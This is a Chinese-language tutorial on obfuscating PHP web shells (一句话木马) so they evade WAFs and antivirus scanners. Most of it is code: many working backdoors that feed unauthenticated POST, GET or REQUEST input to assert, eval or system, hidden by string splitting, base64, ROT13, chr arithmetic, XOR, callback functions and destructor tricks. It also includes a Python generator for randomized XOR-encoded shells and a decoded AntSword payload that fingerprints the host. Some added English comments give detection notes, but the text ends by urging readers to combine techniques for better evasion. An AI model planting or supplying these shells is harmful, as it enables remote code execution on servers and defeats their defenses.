php木马的混淆免杀探究
PHP木马混淆免杀技术详解
前言
在渗透测试或CTF竞赛中,面对Web应用防火墙(WAF)的防护,普通的一句话木马(Web Shell)通常会被检测出来。WAF的作用是监测并阻止恶意的HTTP请求和输入,因此要成功渗透并避免被检测,PHP木马免杀技术是非常重要的一项技能。
静态免杀技术
静态免杀主要通过修改代码,使得其中的关键字或可疑函数变得不可识别。以下是一些常见的静态免杀方法:
1. 关键字隐藏技术
拆解合并法
<?php
// Sample: the callable name is assembled at runtime from pieces of an innocuous
// looking string, so a scanner matching the literal token "assert" sees nothing.
$ch = explode(".", "hello.ass.world.er.t");
$c = $ch[1] . $ch[3] . $ch[4]; //assert
// Unauthenticated POST input evaluated as PHP. Detection note: the signal is a
// variable-function call fed from a request superglobal, not the keyword itself.
// assert() stopped evaluating string arguments in PHP 8.0 (deprecated since 7.2),
// so this form only executes code on 7.x.
$c($_POST['x']);
?>
二维数组隐藏
<?php
// Sample: "system" is rebuilt with substr_replace ("systxx" -> "system") and
// called with a hard-coded command. The nested array()/$arrayName assignments only
// wrap the result; they add no behaviour beyond dressing up the call.
$f = substr_replace("systxx", "em", 4);
$z = array($arrayName = ($arrayName = ($arrayName = array('a' => $f('whoami')))));
var_dump($z);
2. 编码技术
ROT13编码
<?php
// Sample: ROT13 hides the callable name; the decoded value is shown in the
// comments. This snippet only prints the decoded name and never invokes it.
$c = str_rot13('n!ff!re!nffreg');
echo $c . "\n"; //a!ss!er!assert
$str = explode('!', $c)[3];
echo $str; //assert
Base64编码
<?php
// Sample: base64_decode() in its default non-strict mode skips characters outside
// the base64 alphabet, so the underscores are ignored and "YXNzZXJ0" decodes to
// "assert". Detection note: any decoder used to inspect embedded base64 has to be
// equally lenient, or the literal will not decode.
$f = base64_decode("YX____Nz__ZX__J0"); // decodes to the high-risk function assert
// Unquoted key: aabyss is an undefined constant (warning on PHP 7.2+, fatal Error on
// 8.0+), and assert() no longer evaluates strings on 8.0+ either.
$f($_POST[aabyss]); //assert($_POST[aabyss]);
?>
ASCII编码
<?php
// Sample: the function name is spelled out as chr() arithmetic (97,115,115,101,
// 114,116) so the literal never appears in the file.
//ASCII-encoded; decodes to the high-risk function assert
$f = chr(98-1).chr(116-1).chr(116-1).chr(103-2).chr(112+2).chr(110+6);
// Unauthenticated POST input evaluated as PHP (PHP 7.x only: assert() stopped
// evaluating strings in 8.0).
$f($_POST['aabyss']); //assert($_POST['aabyss']);
?>
3. 函数拼接技术
array_map实例
<?php
// Sample: the name is held as single characters and joined through an
// array_map()/implode() round trip; strtolower is a no-op on these letters.
$letters = array('a','s','s','e','r','t');
$c = implode(array_map('strtolower', $letters)); // joins the pieces into assert
// Unauthenticated POST input evaluated as PHP (PHP 7.x assert semantics).
$c($_POST['x']);
?>
str_replace实例
<?php
// Sample: the name is built one character at a time; the str_replace('a','a')
// line is a no-op that only adds a benign-looking call.
$str = 'a';
$str = str_replace('a', 'a', $str);
$str .= 's';
$str .= 's';
$str .= 'e';
$str .= 'r';
$str .= 't';
// Unauthenticated POST input evaluated as PHP (PHP 7.x assert semantics).
$str($_POST['x']);
4. 异或绕过技术
<?php
// Sample: each character is stored as the XOR of two one-byte strings; the six
// pieces concatenate to "assert". This fragment only builds the string and never
// calls it. Detection note: the byte pairs and variable names differ per generated
// sample (see the generator below), so the structural pattern -- a run of
// "X" ^ "\xNN" assignments into $_xxx variables followed by a concatenation -- is
// what a rule has to match, not the values.
$_StL = "Y" ^ "\x38";
$_ENr = "T" ^ "\x27";
$_ohw = "^" ^ "\x2d";
$_gpN = "~" ^ "\x1b";
$_fyR = "g" ^ "\x15";
$_pAs = "H" ^ "\x3c";
$c = $_StL.$_ENr.$_ohw.$_gpN.$_fyR.$_pAs;
Python生成异或绕过免杀马脚本:
import random
def random_keys(len):
# Draws `len` distinct characters (random.sample does not repeat) from a key
# alphabet that also contains the backtick; the parameter shadows the builtin len.
str = '`abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str, len))
def random_var(len):
# Same as random_keys without the backtick; used for the variable-name suffixes.
str = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str, len))
def xor(c1, c2):
# XORs two characters and renders the result as a PHP "\xNN" escape by replacing
# hex()'s "0x" prefix; single-digit results come out as e.g. "\x5".
return hex(ord(c1) ^ ord(c2)).replace('0x', r"\x")
def generate(target):
# Prints one `$_abc="k"^"\xNN";` line per character of target, then a
# `$target=$_abc.$_def...;` concatenation line. Key bytes and variable names are
# re-drawn on every run, so no two outputs share literal content; from the
# detection side only the structure (repeated one-byte XOR assignments feeding a
# concatenation) is stable.
key = random_keys(len(target))
func_line = ''
call = '$target='
for i in range(0, len(target)):
enc = xor(target[i], key[i])
var = random_var(3)
func_line += f'$_{var}="{key[i]}"^"{enc}";'
func_line += '\n'
call += '$_%s.' % var
# drop the trailing "." before terminating the statement
call = call.rstrip('.') + ';'
print(func_line)
print(call)
if __name__ == '__main__':
# Reads the name to encode from stdin and prints the PHP fragment.
target = input('input target to generate: \r\n')
generate(target)
5. 类与函数分散技术
多函数分散
<?php
// Returns the single character of $str at offset $i -- a thin substr() wrapper whose
// only role in the sample is to spread the callable name across several calls.
function getPart($str, $i) { return substr($str, $i, 1); }
// Concatenates six one-letter getPart() calls into "assert"; every argument is
// already a single character, so the substr() inside is a no-op.
function combineParts() {
return getPart('a',0).getPart('s',0).getPart('s',0).getPart('e',0).getPart('r',0).getPart('t',0);
}
$c = combineParts();
// Unauthenticated POST input evaluated as PHP. The @ suppresses any warning (for
// instance the 7.2+ deprecation for string assert), which is itself a signal worth
// matching alongside the variable-function call.
@$c($_POST['x']);
?>
类方法隐藏
<?php
// Sample: the call is deferred to __destruct(), so no executable statement appears
// outside the class body; it fires when the object is destroyed (at script shutdown
// for the instance created below).
class Test {
public $config = '';
function __destruct() {
// pieces 1, 5 and 4 of the split string: "ass" . "e" . "rt"
$ch = explode(".", "hello.ass.world.er.rt.e.saucerman");
$c = $ch[1].$ch[5].$ch[4];
// $config holds raw request input at this point; @ hides the resulting warnings.
@$c($this->config);
}
}
$test = new Test();
// Unauthenticated POST input stored on the object; consumed by __destruct().
@$test->config = $_POST['x'];
6. 冷门回调函数技术
array_uintersect_uassoc示例
<?php
// Three-way comparator (0 / 1 / -1) used as the key-compare callback below; it
// does nothing harmful itself and only exists to satisfy the callback signature.
function myfunction_key($a, $b){
if($a===$b){ return 0; }
return ($a>$b)?1:-1;
}
// Sample: both the callback-taking function and the callback name are XOR-encoded
// in the constructor and only used in __destruct(), so neither literal appears in
// the file. fHfoj receives the request input (assigned after construction).
class rtHjmCdS {
public $fHfoj;
public $fDaGv;
public $HgAjSd;
function __construct(){
// six XOR pairs -> "assert"
$_xlr = "J" ^ "\x2b";
$_Nbv = "V" ^ "\x25";
$_cfh = "T" ^ "\x27";
$_PdK = "I" ^ "\x2c";
$_zJQ = "+" ^ "\x59";
$_RgD = "=" ^ "\x49";
$this->fDaGv = $_xlr.$_Nbv.$_cfh.$_PdK.$_zJQ.$_RgD;
// twenty-three XOR pairs -> "array_uintersect_uassoc"
$_fLd = "a" ^ "\x0";
$_wOK = "j" ^ "\x18";
$_tAH = "U" ^ "\x27";
$_HeV = "J" ^ "\x2b";
$_cyo = "-" ^ "\x54";
$_iSW = "F" ^ "\x19";
$_jYS = "/" ^ "\x5a";
$_BFt = "h" ^ "\x1";
$_TRn = "p" ^ "\x1e";
$_izx = "k" ^ "\x1f";
$_gMz = "X" ^ "\x3d";
$_TNu = "<" ^ "\x4e";
$_UiE = "v" ^ "\x5";
$_iHI = "q" ^ "\x14";
$_LIK = "m" ^ "\xe";
$_Yey = "Z" ^ "\x2e";
$_lMr = "=" ^ "\x62";
$_WOI = "+" ^ "\x5e";
$_FQy = "u" ^ "\x14";
$_sjC = "d" ^ "\x17";
$_mOr = ">" ^ "\x4d";
$_Txf = "*" ^ "\x45";
$_PmW = "O" ^ "\x2c";
$this->HgAjSd = $_fLd.$_wOK.$_tAH.$_HeV.$_cyo.$_iSW.$_jYS.$_BFt.$_TRn.$_izx.$_gMz.$_TNu.$_UiE.$_iHI.$_LIK.$_Yey.$_lMr.$_WOI.$_FQy.$_sjC.$_mOr.$_Txf.$_PmW;
}
function __destruct(){
$Hfdag = $this->HgAjSd; //'array_uintersect_uassoc'
$fdJfd = $this->fDaGv; // 'assert'
// The value-compare callback ($fdJfd) is invoked with elements of the two arrays,
// so the request string in fHfoj reaches assert(). Detection note: a callback-
// taking array function whose callback argument is a variable rather than a
// literal is the generic shape here; the same applies to the other callback
// functions listed after this sample.
@$Hfdag(array($this->fHfoj),array(''),$fdJfd,'myfunction_key');
}
}
$jfnp = new rtHjmCdS();
// Unauthenticated input from any channel ($_REQUEST covers GET, POST and cookies),
// stored for the destructor.
@$jfnp->fHfoj = $_REQUEST['css'];
?>
其他常见回调函数:
- call_user_func_array()
- call_user_func()
- array_filter()
- array_walk()
- array_map()
- register_shutdown_function()
- register_tick_function()
- filter_var()
- filter_var_array()
- uasort()
- uksort()
- array_reduce()
- array_walk()
- array_walk_recursive()
7. 字符串读取技术
读取注释
<?php
/**
* system('whoami');
* */
class User {}
// Sample: the command text lives inside a docblock, which a scanner may treat as an
// inert comment; ReflectionClass::getDocComment() reads it back as a string.
$user = new ReflectionClass('User');
$comment = $user->getDocComment();
echo $comment;
echo "\n";
// NOTE(review): the offsets 8/17 depend on the docblock's exact whitespace, which
// this listing may not preserve; the intended extract is the system() call.
$f = substr($comment, 8, 17);
echo $f;
// Executes the extracted string as PHP; nothing outside the comment names system().
eval($f);
读取数据库
<?php
// Sample: a SQLite file is written from a base64 blob, but the database is never
// actually consulted for the name -- PDOStatement::$queryString is the prepared SQL
// text itself, and substr(-7, 6) cuts "system" out of the literal name="system".
// The execute() result is never read.
// write the database file
$datatest = "[文件的base64编码]";
file_put_contents('./要写入的文件名', base64_decode($datatest));
// read the database contents
$path = "数据库文件名";
$db = new PDO("sqlite:" . $path);
$sql_stmt = $db->prepare('select * from test where name="system"');
$sql_stmt->execute();
$f = substr($sql_stmt->queryString, -7, 6);
// Unauthenticated GET parameter passed to the shell.
$f($_GET['b']);
动态免杀技术
要绕过流量监测,尤其是WAF的检测,我们可以通过对木马的动态行为、函数和关键字进行混淆和编码。
蚁剑连接示例
原始木马:
<?php
// Unobfuscated reference sample: eval() on a property, again deferred to
// __destruct(). The interpolated "$this->name" is just the property's string value.
class Test {
public $name = '';
function __destruct(){
// eval of request-controlled text; the literal keyword is what keyword-based
// scanners match on.
@eval("$this->name");
}
}
$test = new Test();
// @ silences the undefined-index notice when 'css' is absent; the POST value is
// what __destruct() evaluates.
$c = @$_POST['css'];
$test->name = $c;
蚁剑连接时的POST数据(解码后):
<?php
// Per the text above, this is the decoded POST body the shell evaluates. Error
// display is switched off and the time limit removed before anything else runs.
@ini_set("display_errors", "0");
@set_time_limit(0);
// Identity "encoder": returns the output unchanged (no response encoding here).
function asenc($out) { return $out; }
// Emits the buffered output wrapped in the fixed markers "ae2ea" ... "348cb",
// presumably so the client can locate the result in the HTTP response.
// Detection note: the constant delimiters and the ob_start()/ob_end_clean()
// bracketing appear verbatim in request and response and are a practical
// signature for this traffic.
function asoutput() {
$output = ob_get_contents();
ob_end_clean();
echo "ae2ea";
echo @asenc($output);
echo "348cb";
}
ob_start();
try {
// Host fingerprint: script directory, drive letters on non-POSIX paths (or "/"),
// php_uname() and the effective user, tab-separated. This looks like the client's
// first-contact probe; the same call sequence from a web worker is a strong
// indicator regardless of how the shell itself is obfuscated.
$D = dirname($_SERVER["SCRIPT_FILENAME"]);
if($D == "") {
$D = dirname($_SERVER["PATH_TRANSLATED"]);
}
$R = "{$D}\t";
if(substr($D,0,1) != "/") {
// path does not start with "/": probe C: .. Z: for existing drives
foreach(range("C","Z") as $L) {
if(is_dir("{$L}:")) {
$R .= "{$L}:";
}
}
} else {
$R .= "/";
}
$R .= "\t";
// NOTE: tests for posix_getegid but then calls posix_getpwuid/posix_geteuid; the
// three ship together in the posix extension, so the check is loose rather than wrong.
$u = function_exists("posix_getegid") ? @posix_getpwuid(@posix_geteuid()) : "";
$s = $u ? $u["name"] : @get_current_user();
$R .= php_uname();
$R .= "\t{$s}";
echo $R;
} catch(Exception $e) {
// only Exception is caught; a PHP 8 Error would escape this handler
echo "ERROR://".$e->getMessage();
}
asoutput();
die();
总结
PHP木马免杀技术主要包括:
- 静态免杀:
- 关键字拆分与拼接
- 各种编码技术(Base64、ROT13、ASCII等)
- 异或运算绕过
- 使用冷门回调函数
- 类与函数分散技术
- 字符串读取技术
- 动态免杀:
- 流量混淆
- 动态行为伪装
- 蚁剑等工具的特殊编码方式
这些技术可以单独使用,也可以组合使用以达到更好的免杀效果。在实际应用中,需要根据目标环境的特点选择合适的免杀方法。